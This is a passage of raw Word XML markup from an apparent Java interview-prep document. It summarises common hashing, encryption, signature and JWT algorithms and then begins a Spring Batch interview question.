        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SHA-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 160-bit, also weak now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01AC37" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SHA-256 / SHA-512 (SHA-2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Stronger, widely used in modern systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A388129" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BCrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Adaptive hashing, used for password hashing with salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFF12A" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PBKDF2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Password-Based Key Derivation Function, includes salt and iteration count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293A7FC" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="00000000" w:rsidP="00B1664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BC275E7">
          <v:rect id="_x0000_i2162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A02C36" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Encryption Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD0044" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encrypt/decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FF2B7" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Symmetric Encryption (Same key for encrypt/decrypt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F314B" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AES (Advanced Encryption Standard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Industry standard, secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2E9C8" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DES/3DES (Data Encryption Standard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Older, no longer recommended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF67D7" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Asymmetric Encryption (Public/Private key pair)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F4FD6" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Used in SSL/TLS, digital signatures, secure key exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6AF70" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ECC (Elliptic Curve Cryptography)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Like RSA but with shorter keys and better performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E54EB4" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="00000000" w:rsidP="00B1664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320413">
          <v:rect id="_x0000_i2163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F092243" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Message Authentication Code (MAC) / Digital Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C743A22" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used to ensure message integrity and authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7035E" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HMAC-SHA256</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Keyed-hashing for message authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678FEE6" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Digital Signature Algorithm (DSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7778E" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RSA with SHA-256 (RSASSA-PKCS1-v1_5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07122655" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="00000000" w:rsidP="00B1664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FD308C4">
          <v:rect id="_x0000_i2164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5530A4" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Token Algorithms (used in JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537F267" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HS256 / HS512</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – HMAC using SHA-256/512 (Symmetric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5AFF55" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RS256 / RS512</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – RSA with SHA-256/512 (Asymmetric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14023646" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006F498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E044C6D">
          <v:rect id="_x0000_i2165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6CEDA" w14:textId="33E8DF77" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="009F301D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5480D8" w14:textId="0232285A" w:rsidR="00712F11" w:rsidRPr="00CE4B95" w:rsidRDefault="00712F11" w:rsidP="00712F11">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc196307957"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Batch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w14:paraId="3C795115" w14:textId="77777777" w:rsidR="00131EF4" w:rsidRPr="00CE4B95" w:rsidRDefault="00131EF4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1528735D" w14:textId="77777777" w:rsidR="00131EF4" w:rsidRPr="00CE4B95" w:rsidRDefault="00131EF4" w:rsidP="00131EF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="_Toc196307958"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Spring batch? Explain where you have used the spring batch in your project?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w14:paraId="6030DFF9" w14:textId="510B4765" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="006B7D5F">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pring Batch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
